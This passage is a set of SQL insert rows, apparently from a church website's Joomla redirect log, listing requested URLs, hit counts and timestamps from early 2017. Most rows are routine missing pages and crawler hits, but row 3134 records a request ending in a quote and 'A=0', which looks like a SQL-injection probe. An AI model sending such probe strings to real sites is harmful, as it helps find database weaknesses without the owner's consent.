(3129, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/45889', NULL, '', '', 1, 0, '2017-01-29 19:21:26', '0000-00-00 00:00:00', 301),
(3130, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/73360', NULL, '', '', 1, 0, '2017-01-29 19:26:24', '0000-00-00 00:00:00', 301),
(3131, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/98741', NULL, '', '', 1, 0, '2017-01-29 19:33:28', '0000-00-00 00:00:00', 301),
(3132, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/5/-', NULL, '', '', 1, 0, '2017-01-29 23:19:58', '0000-00-00 00:00:00', 301),
(3133, 'http://www.lifeoasisinternationalchurch.org/index.php/branches/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-01-30 00:52:53', '0000-00-00 00:00:00', 301),
(3134, 'http://www.lifeoasisinternationalchurch.org/branches\'A=0', NULL, 'http://www.lifeoasisinternationalchurch.org/branches\'A=0', '', 1, 0, '2017-01-30 01:03:08', '0000-00-00 00:00:00', 301),
(3135, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/92021', NULL, '', '', 1, 0, '2017-01-30 03:02:01', '0000-00-00 00:00:00', 301),
(3136, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/30349', NULL, '', '', 1, 0, '2017-01-30 03:10:25', '0000-00-00 00:00:00', 301),
(3137, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/69221', NULL, '', '', 1, 0, '2017-01-30 03:13:46', '0000-00-00 00:00:00', 301),
(3138, 'http://lifeoasisinternationalchurch.org/index.php/143-day-17', NULL, '', '', 1, 0, '2017-01-30 03:55:34', '0000-00-00 00:00:00', 301),
(3139, 'http://www.lifeoasisinternationalchurch.org/138-2014-9', NULL, '', '', 1, 0, '2017-01-30 05:20:47', '0000-00-00 00:00:00', 301),
(3140, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/8', NULL, '', '', 2, 0, '2017-01-30 05:36:30', '0000-00-00 00:00:00', 301),
(3141, 'http://www.lifeoasisinternationalchurch.org/index.php/198-2015-day-23', NULL, '', '', 5, 0, '2017-01-30 05:46:38', '0000-00-00 00:00:00', 301),
(3142, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/24/-', NULL, '', '', 1, 0, '2017-01-30 06:13:24', '0000-00-00 00:00:00', 301),
(3143, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/22', NULL, '', '', 3, 0, '2017-01-30 07:07:55', '0000-00-00 00:00:00', 301),
(3144, 'http://www.lifeoasisinternationalchurch.org/index.php/139-day-13', NULL, '', '', 5, 0, '2017-01-30 07:28:52', '0000-00-00 00:00:00', 301),
(3145, 'http://lifeoasisinternationalchurch.org/streamingn', NULL, '', '', 1, 0, '2017-01-30 08:35:56', '0000-00-00 00:00:00', 301),
(3146, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/22-prophetic-words-for-day-13', NULL, '', '', 1, 0, '2017-01-30 10:40:17', '0000-00-00 00:00:00', 301),
(3147, 'http://www.lifeoasisinternationalchurch.org/index.php/217-2015-day-40', NULL, '', '', 9, 0, '2017-01-30 10:53:25', '0000-00-00 00:00:00', 301),
(3148, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog', NULL, '', '', 1, 0, '2017-01-30 11:05:09', '0000-00-00 00:00:00', 301),
(3149, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/13', NULL, '', '', 4, 0, '2017-01-30 11:54:37', '0000-00-00 00:00:00', 301),
(3150, 'http://lifeoasisinternationalchurch.org/prayer/75-day-23', NULL, '', '', 1, 0, '2017-01-30 12:19:37', '0000-00-00 00:00:00', 301),
(3151, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/13/-', NULL, '', '', 1, 0, '2017-01-30 13:10:22', '0000-00-00 00:00:00', 301),
(3152, 'http://lifeoasisinternationalchurch.org/index.php/component/user/', NULL, 'http://lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 8486, 0, '2017-01-30 14:09:53', '0000-00-00 00:00:00', 301),
(3153, 'http://www.lifeoasisinternationalchurch.org/loicforum/archive', NULL, 'http://www.lifeoasisinternationalchurch.org/loicforum/archive', '', 11, 0, '2017-01-30 17:08:20', '0000-00-00 00:00:00', 301),
(3154, 'http://lifeoasisinternationalchurch.org/guestbook', NULL, 'http://lifeoasisinternationalchurch.org/', '', 2, 0, '2017-01-30 20:04:50', '0000-00-00 00:00:00', 301),
(3155, 'http://www.lifeoasisinternationalchurch.org/pastors', NULL, '', '', 1, 0, '2017-01-30 20:43:12', '0000-00-00 00:00:00', 301),
(3156, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/15/-', NULL, '', '', 1, 0, '2017-01-30 21:08:10', '0000-00-00 00:00:00', 301),
(3157, 'http://www.lifeoasisinternationalchurch.org/index.php/242-day-4-of-21-days-fasting-and-prayer-october', NULL, '', '', 9, 0, '2017-01-30 22:36:19', '0000-00-00 00:00:00', 301),
(3158, 'http://www.lifeoasisinternationalchurch.org/index.php/63-2014-10', NULL, '', '', 6, 0, '2017-01-30 23:09:47', '0000-00-00 00:00:00', 301),
(3159, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/10-prayer-a-fasting-day-1', NULL, '', '', 4, 0, '2017-01-30 23:30:14', '0000-00-00 00:00:00', 301),
(3160, 'http://www.lifeoasisinternationalchurch.org/https://www.lifeoasisinternationalchurch.org/', NULL, '', '', 1, 0, '2017-01-30 23:45:51', '0000-00-00 00:00:00', 301),
(3161, 'http://www.lifeoasisinternationalchurch.org/finance/events', NULL, '', '', 1, 0, '2017-01-31 03:48:21', '0000-00-00 00:00:00', 301),
(3162, 'http://www.lifeoasisinternationalchurch.org/template-info/wimmp/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-01-31 03:56:09', '0000-00-00 00:00:00', 301),
(3163, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&tmpl=component&id=63&popupiniframe=true', NULL, '', '', 17, 0, '2017-01-31 03:58:42', '0000-00-00 00:00:00', 301),
(3164, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/21-prayer-a-fasting-day-12', NULL, '', '', 1, 0, '2017-01-31 04:37:29', '0000-00-00 00:00:00', 301),
(3165, 'http://www.lifeoasisinternationalchurch.org/124-prayer-focus-for-day-35', NULL, '', '', 1, 0, '2017-01-31 05:14:34', '0000-00-00 00:00:00', 301),
(3166, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/7/-', NULL, '', '', 1, 0, '2017-01-31 05:20:07', '0000-00-00 00:00:00', 301),
(3167, 'http://www.lifeoasisinternationalchurch.org/index.php/gallery', NULL, '', '', 2, 0, '2017-01-31 06:43:54', '0000-00-00 00:00:00', 301),
(3168, 'http://lifeoasisinternationalchurch.org/prayer/146-day222014', NULL, '', '', 1, 0, '2017-01-31 06:50:41', '0000-00-00 00:00:00', 301),
(3169, 'http://www.lifeoasisinternationalchurch.org/finance/hotel', NULL, '', '', 1, 0, '2017-01-31 07:39:44', '0000-00-00 00:00:00', 301),
(3170, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 3, 0, '2017-01-31 08:36:41', '0000-00-00 00:00:00', 301),
(3171, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/13/-', NULL, '', '', 1, 0, '2017-01-31 10:02:06', '0000-00-00 00:00:00', 301),
(3172, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/5/-', NULL, '', '', 1, 0, '2017-01-31 10:05:58', '0000-00-00 00:00:00', 301),
(3173, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/25/-', NULL, '', '', 1, 0, '2017-01-31 10:13:42', '0000-00-00 00:00:00', 301),
(3174, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/18/-', NULL, '', '', 1, 0, '2017-01-31 10:24:52', '0000-00-00 00:00:00', 301),
(3175, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/21/-', NULL, '', '', 1, 0, '2017-01-31 10:28:39', '0000-00-00 00:00:00', 301),
(3176, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/6/-', NULL, '', '', 1, 0, '2017-01-31 10:32:25', '0000-00-00 00:00:00', 301),
(3177, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/20/-', NULL, '', '', 1, 0, '2017-01-31 10:36:15', '0000-00-00 00:00:00', 301),
(3178, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/14/-', NULL, '', '', 1, 0, '2017-01-31 10:40:03', '0000-00-00 00:00:00', 301),
(3179, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/14/-', NULL, '', '', 1, 0, '2017-01-31 10:43:53', '0000-00-00 00:00:00', 301),
(3180, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/26/-', NULL, '', '', 1, 0, '2017-01-31 10:47:50', '0000-00-00 00:00:00', 301),
(3181, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/2/-', NULL, '', '', 1, 0, '2017-01-31 10:51:21', '0000-00-00 00:00:00', 301),
(3182, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/26/-', NULL, '', '', 1, 0, '2017-01-31 10:55:14', '0000-00-00 00:00:00', 301),
(3183, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/27/-', NULL, '', '', 1, 0, '2017-01-31 10:59:02', '0000-00-00 00:00:00', 301),
(3184, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/5/-', NULL, '', '', 1, 0, '2017-01-31 11:02:46', '0000-00-00 00:00:00', 301),
(3185, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/17/-', NULL, '', '', 1, 0, '2017-01-31 11:06:33', '0000-00-00 00:00:00', 301),
(3186, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/27/-', NULL, '', '', 1, 0, '2017-01-31 11:10:19', '0000-00-00 00:00:00', 301),
(3187, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/9/-', NULL, '', '', 1, 0, '2017-01-31 11:14:11', '0000-00-00 00:00:00', 301),
(3188, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/24/-', NULL, '', '', 1, 0, '2017-01-31 11:17:54', '0000-00-00 00:00:00', 301),
(3189, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/1/-', NULL, '', '', 1, 0, '2017-01-31 11:21:45', '0000-00-00 00:00:00', 301),
(3190, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/15/-', NULL, '', '', 1, 0, '2017-01-31 11:26:05', '0000-00-00 00:00:00', 301),
(3191, 'http://www.lifeoasisinternationalchurch.org/2011-08-10-21-22-58', NULL, '', '', 2, 0, '2017-01-31 13:13:33', '0000-00-00 00:00:00', 301),
(3192, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/17/-', NULL, '', '', 1, 0, '2017-01-31 16:04:31', '0000-00-00 00:00:00', 301),
(3193, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/3/-', NULL, '', '', 1, 0, '2017-01-31 16:08:18', '0000-00-00 00:00:00', 301),
(3194, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/21/-', NULL, '', '', 1, 0, '2017-01-31 16:12:05', '0000-00-00 00:00:00', 301),
(3195, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/23/-', NULL, '', '', 1, 0, '2017-01-31 16:15:53', '0000-00-00 00:00:00', 301),
(3196, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/1/-', NULL, '', '', 1, 0, '2017-01-31 16:19:40', '0000-00-00 00:00:00', 301),
(3197, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/3/-', NULL, '', '', 1, 0, '2017-01-31 16:23:28', '0000-00-00 00:00:00', 301),
(3198, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/17/-', NULL, '', '', 1, 0, '2017-01-31 16:27:16', '0000-00-00 00:00:00', 301),
(3199, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/5/-', NULL, '', '', 1, 0, '2017-01-31 16:31:02', '0000-00-00 00:00:00', 301),
(3200, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/16/-', NULL, '', '', 1, 0, '2017-01-31 16:34:51', '0000-00-00 00:00:00', 301),
(3201, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/16/-', NULL, '', '', 1, 0, '2017-01-31 16:38:38', '0000-00-00 00:00:00', 301),
(3202, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/27/-', NULL, '', '', 1, 0, '2017-01-31 16:42:26', '0000-00-00 00:00:00', 301),
(3203, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/30/-', NULL, '', '', 1, 0, '2017-01-31 16:46:16', '0000-00-00 00:00:00', 301),
(3204, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/30/-', NULL, '', '', 1, 0, '2017-01-31 16:49:59', '0000-00-00 00:00:00', 301),
(3205, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/8/-', NULL, '', '', 1, 0, '2017-01-31 16:53:47', '0000-00-00 00:00:00', 301),
(3206, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/21/-', NULL, '', '', 1, 0, '2017-01-31 16:57:34', '0000-00-00 00:00:00', 301),
(3207, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/22/-', NULL, '', '', 1, 0, '2017-01-31 17:01:22', '0000-00-00 00:00:00', 301),
(3208, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/19/-', NULL, '', '', 1, 0, '2017-01-31 17:05:08', '0000-00-00 00:00:00', 301),
(3209, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/24/-', NULL, '', '', 1, 0, '2017-01-31 17:08:56', '0000-00-00 00:00:00', 301),
(3210, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/7/-', NULL, '', '', 1, 0, '2017-01-31 17:12:43', '0000-00-00 00:00:00', 301),
(3211, 'http://www.lifeoasisinternationalchurch.org/145-2014-16', NULL, '', '', 1, 0, '2017-01-31 17:15:41', '0000-00-00 00:00:00', 301),
(3212, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/3/-', NULL, '', '', 1, 0, '2017-01-31 17:16:31', '0000-00-00 00:00:00', 301),
(3213, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/10/-', NULL, '', '', 1, 0, '2017-01-31 17:20:18', '0000-00-00 00:00:00', 301),
(3214, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/12/-', NULL, '', '', 1, 0, '2017-01-31 17:24:05', '0000-00-00 00:00:00', 301),
(3215, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/18/-', NULL, '', '', 1, 0, '2017-01-31 17:27:53', '0000-00-00 00:00:00', 301),
(3216, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/14/-', NULL, '', '', 1, 0, '2017-01-31 17:31:40', '0000-00-00 00:00:00', 301),
(3217, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/20/-', NULL, '', '', 1, 0, '2017-01-31 17:35:27', '0000-00-00 00:00:00', 301),
(3218, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/17/-', NULL, '', '', 1, 0, '2017-01-31 17:39:15', '0000-00-00 00:00:00', 301),
(3219, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/14/-', NULL, '', '', 1, 0, '2017-01-31 17:43:02', '0000-00-00 00:00:00', 301),
(3220, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/23/-', NULL, '', '', 1, 0, '2017-01-31 17:46:50', '0000-00-00 00:00:00', 301),
(3221, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/13/-', NULL, '', '', 1, 0, '2017-01-31 17:50:37', '0000-00-00 00:00:00', 301),
(3222, 'http://www.lifeoasisinternationalchurch.org/prayer/161-day222014-5', NULL, '', '', 1, 0, '2017-01-31 18:33:25', '0000-00-00 00:00:00', 301),
(3223, 'http://ljmti.lifeoasisinternationalchurch.org/www.delicious.com', NULL, '', '', 1, 0, '2017-01-31 19:55:06', '0000-00-00 00:00:00', 301),
(3224, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/23', NULL, '', '', 3, 0, '2017-01-31 20:20:48', '0000-00-00 00:00:00', 301),
(3225, 'http://lifeoasisinternationalchurch.org/prayer/162-focus20', NULL, '', '', 2, 0, '2017-01-31 20:58:43', '0000-00-00 00:00:00', 301),
(3226, 'http://ljmti.lifeoasisinternationalchurch.org/portfolio/gallery-by-category', NULL, '', '', 4, 0, '2017-01-31 23:34:59', '0000-00-00 00:00:00', 301),
(3227, 'http://www.lifeoasisinternationalchurch.org/136-20148', NULL, '', '', 1, 0, '2017-02-01 00:32:59', '0000-00-00 00:00:00', 301),
(3228, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/31/-', NULL, '', '', 1, 0, '2017-02-01 00:53:02', '0000-00-00 00:00:00', 301),
(3229, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/10/-', NULL, '', '', 1, 0, '2017-02-01 00:56:08', '0000-00-00 00:00:00', 301),
(3230, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/17/-', NULL, '', '', 1, 0, '2017-02-01 01:00:08', '0000-00-00 00:00:00', 301),
(3231, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/11/-', NULL, '', '', 1, 0, '2017-02-01 01:15:24', '0000-00-00 00:00:00', 301),
(3232, 'http://ljmti.lifeoasisinternationalchurch.org/component/content/article/1-latest-news/63-recent-news-update', NULL, '', '', 1, 0, '2017-02-01 01:15:46', '0000-00-00 00:00:00', 301),
(3233, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/18/-', NULL, '', '', 1, 0, '2017-02-01 01:18:53', '0000-00-00 00:00:00', 301),
(3234, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/9/-', NULL, '', '', 1, 0, '2017-02-01 01:22:39', '0000-00-00 00:00:00', 301),
(3235, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/7/-', NULL, '', '', 1, 0, '2017-02-01 01:30:18', '0000-00-00 00:00:00', 301),
(3236, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/9/-', NULL, '', '', 1, 0, '2017-02-01 01:33:59', '0000-00-00 00:00:00', 301),
(3237, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/27/-', NULL, '', '', 1, 0, '2017-02-01 01:37:46', '0000-00-00 00:00:00', 301),
(3238, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/31/-', NULL, '', '', 1, 0, '2017-02-01 01:41:35', '0000-00-00 00:00:00', 301),
(3239, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/1/-', NULL, '', '', 1, 0, '2017-02-01 01:45:21', '0000-00-00 00:00:00', 301),
(3240, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/21/-', NULL, '', '', 1, 0, '2017-02-01 01:49:25', '0000-00-00 00:00:00', 301),
(3241, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/16/-', NULL, '', '', 1, 0, '2017-02-01 01:52:56', '0000-00-00 00:00:00', 301),
(3242, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/9/-', NULL, '', '', 1, 0, '2017-02-01 02:00:37', '0000-00-00 00:00:00', 301),
(3243, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/8/-', NULL, '', '', 1, 0, '2017-02-01 02:04:18', '0000-00-00 00:00:00', 301),
(3244, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/23/-', NULL, '', '', 1, 0, '2017-02-01 02:08:05', '0000-00-00 00:00:00', 301),
(3245, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/8/-', NULL, '', '', 1, 0, '2017-02-01 02:12:04', '0000-00-00 00:00:00', 301),
(3246, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/19/-', NULL, '', '', 1, 0, '2017-02-01 02:15:40', '0000-00-00 00:00:00', 301),
(3247, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&format=feed&limitstart=&type=rss&Itemid=775', NULL, '', '', 1, 0, '2017-02-01 03:52:28', '0000-00-00 00:00:00', 301),
(3248, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Lighthouse&format=feed&limitstart=&type=rss', NULL, '', '', 1, 0, '2017-02-01 03:54:36', '0000-00-00 00:00:00', 301),
(3249, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&format=feed&limitstart=&Itemid=775', NULL, '', '', 1, 0, '2017-02-01 03:55:24', '0000-00-00 00:00:00', 301),
(3250, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&format=feed&limitstart=', NULL, '', '', 1, 0, '2017-02-01 03:59:38', '0000-00-00 00:00:00', 301),
(3251, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/16', NULL, '', '', 3, 0, '2017-02-01 04:45:49', '0000-00-00 00:00:00', 301),
(3252, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=church&format=feed&limitstart=&type=rss&Itemid=775', NULL, '', '', 1, 0, '2017-02-01 05:07:59', '0000-00-00 00:00:00', 301),
(3253, 'http://ljmti.lifeoasisinternationalchurch.org/home/practical-section/63-recent-news-update', NULL, '', '', 1, 0, '2017-02-01 06:01:17', '0000-00-00 00:00:00', 301),
(3254, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=arrowthemes&format=feed&limitstart=&type=atom&Itemid=626', NULL, '', '', 1, 0, '2017-02-01 06:23:48', '0000-00-00 00:00:00', 301),
(3255, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=church&format=feed&limitstart=&Itemid=775', NULL, '', '', 1, 0, '2017-02-01 07:39:33', '0000-00-00 00:00:00', 301),
(3256, 'http://www.lifeoasisinternationalchurch.org/129-prayer-focus-for-day-40', NULL, '', '', 1, 0, '2017-02-01 07:53:05', '0000-00-00 00:00:00', 301),
(3257, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&format=feed&limitstart=&type=atom&Itemid=775', NULL, '', '', 1, 0, '2017-02-01 08:55:53', '0000-00-00 00:00:00', 301),
(3258, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/30/-', NULL, '', '', 1, 0, '2017-02-01 08:56:25', '0000-00-00 00:00:00', 301),
(3259, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/3/-', NULL, '', '', 1, 0, '2017-02-01 09:07:45', '0000-00-00 00:00:00', 301),
(3260, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/6/-', NULL, '', '', 1, 0, '2017-02-01 09:11:33', '0000-00-00 00:00:00', 301),
(3261, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/15/-', NULL, '', '', 1, 0, '2017-02-01 09:19:09', '0000-00-00 00:00:00', 301),
(3262, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/15/-', NULL, '', '', 1, 0, '2017-02-01 09:22:57', '0000-00-00 00:00:00', 301),
(3263, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/3/-', NULL, '', '', 1, 0, '2017-02-01 09:26:45', '0000-00-00 00:00:00', 301),
(3264, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/2/-', NULL, '', '', 1, 0, '2017-02-01 09:30:31', '0000-00-00 00:00:00', 301),
(3265, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/21/-', NULL, '', '', 1, 0, '2017-02-01 09:34:27', '0000-00-00 00:00:00', 301),
(3266, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/8/-', NULL, '', '', 1, 0, '2017-02-01 09:38:06', '0000-00-00 00:00:00', 301),
(3267, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/22/-', NULL, '', '', 1, 0, '2017-02-01 09:41:53', '0000-00-00 00:00:00', 301),
(3268, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/14/-', NULL, '', '', 1, 0, '2017-02-01 09:45:41', '0000-00-00 00:00:00', 301),
(3269, 'http://www.lifeoasisinternationalchurch.org/index.php/component/user/', NULL, '', '', 5026, 0, '2017-02-01 10:03:27', '0000-00-00 00:00:00', 301),
(3270, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&format=feed&limitstart=&type=atom', NULL, '', '', 1, 0, '2017-02-01 10:11:11', '0000-00-00 00:00:00', 301),
(3271, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=music&format=feed&limitstart=&type=rss&Itemid=626', NULL, '', '', 1, 0, '2017-02-01 11:26:56', '0000-00-00 00:00:00', 301),
(3272, 'http://www.lifeoasisinternationalchurch.org/index.php/170-prophetic-words-for-day-6', NULL, '', '', 7, 0, '2017-02-01 11:29:09', '0000-00-00 00:00:00', 301),
(3273, 'http://lifeoasisinternationalchurch.org/prayer/57-prophetic-words-for-day-5', NULL, '', '', 1, 0, '2017-02-01 11:52:51', '0000-00-00 00:00:00', 301),
(3274, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=responsive&format=feed&limitstart=', NULL, '', '', 1, 0, '2017-02-01 12:42:57', '0000-00-00 00:00:00', 301),
(3275, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=responsive&format=feed&limitstart=&type=atom', NULL, '', '', 1, 0, '2017-02-01 13:58:32', '0000-00-00 00:00:00', 301),
(3276, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=music&format=feed&limitstart=&type=atom&Itemid=626', NULL, '', '', 1, 0, '2017-02-01 16:30:07', '0000-00-00 00:00:00', 301),
(3277, 'http://www.lifeoasisinternationalchurch.org/lvestreamimg', NULL, '', '', 1, 0, '2017-02-01 16:54:39', '0000-00-00 00:00:00', 301),
(3278, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/25/-', NULL, '', '', 1, 0, '2017-02-01 16:57:59', '0000-00-00 00:00:00', 301),
(3279, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/5/-', NULL, '', '', 1, 0, '2017-02-01 17:04:54', '0000-00-00 00:00:00', 301),
(3280, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/26/-', NULL, '', '', 1, 0, '2017-02-01 17:12:29', '0000-00-00 00:00:00', 301),
(3281, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/25/-', NULL, '', '', 1, 0, '2017-02-01 17:16:16', '0000-00-00 00:00:00', 301),
(3282, 'http://www.lifeoasisinternationalchurch.org/live', NULL, '', '', 32, 0, '2017-02-01 17:16:49', '0000-00-00 00:00:00', 301),
(3283, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/26/-', NULL, '', '', 1, 0, '2017-02-01 17:20:04', '0000-00-00 00:00:00', 301),
(3284, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/26', NULL, '', '', 3, 0, '2017-02-01 17:20:25', '0000-00-00 00:00:00', 301),
(3285, 'http://lifeoasisinternationalchurch.org/livestream', NULL, '', '', 7, 0, '2017-02-01 17:22:52', '0000-00-00 00:00:00', 301),
